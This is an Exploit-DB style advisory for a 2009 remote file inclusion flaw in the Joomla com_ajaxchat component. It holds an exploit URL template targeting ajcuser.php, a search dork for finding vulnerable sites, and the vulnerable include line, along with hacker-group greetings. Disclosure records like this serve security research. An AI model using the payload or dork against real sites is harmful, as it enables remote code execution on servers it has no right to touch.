Joomla Component com_ajaxchat Remote File Include vulnerability

vendor:

Joomla Component com_ajaxchat

by:

kaMtiEz

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Joomla Component com_ajaxchat

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: a:fijiwebdesign:joomla_component_com_ajaxchat

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_ajaxchat Remote File Include vulnerability

A Remote File Include (RFI) vulnerability exists in Joomla Component com_ajaxchat. The vulnerability is due to the 'ajcuser.php' script not properly sanitizing user-supplied input. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary PHP code on the vulnerable system.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version.

Source

Exploit-DB raw data:

#############################################################################################################
## Joomla Component com_ajaxchat Remote File Include vulnerability 	                                   ##
## Author : kaMtiEz (kamzcrew@gmail.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : September 27, 2009 									   	   ##
#############################################################################################################
# Hello My Name Is :                                                                                       ##
#  __               _____   __  ._____________                                                             ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                      ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                      ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                       ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                      ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-             ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.fijiwebdesign.com/
[+] Download : http://www.fijiwebdesign.com/
[+] version : 1.0 -
[+] Vulnerability : RFI
[+] price : $49.95 
[+] Dork : inurl:"com_ajaxchat"
[+] Location : INDONESIA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]

[ BUG IN ]

ajcuser.php

error in line 7 

// include our comprofiler class
require_once($GLOBALS['mosConfig_absolute_path'].'/components/com_ajaxchat/plugins/plugin.user.php');

[ FIX ]

Tukulesto said : ask to Aurakasih .. lol
kaMtiEz said : tanya ama AuraKasih .. hha
M3Nw5 said : takon Karo AuraKasih .. hha
Arianom Said : coba kau tanya aura kasih lae

Joke.. ;)
#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!!

[ NOTE ] 

[+] makasih buad babe and enyak .... muach ..
[+] makasih buat om tukulesto yg menemani saia selalu dan enggak bosen ma gue .. hahaha
[+] gila 20 Jam duet ma tukulesto akhirnye ada hasil ^_^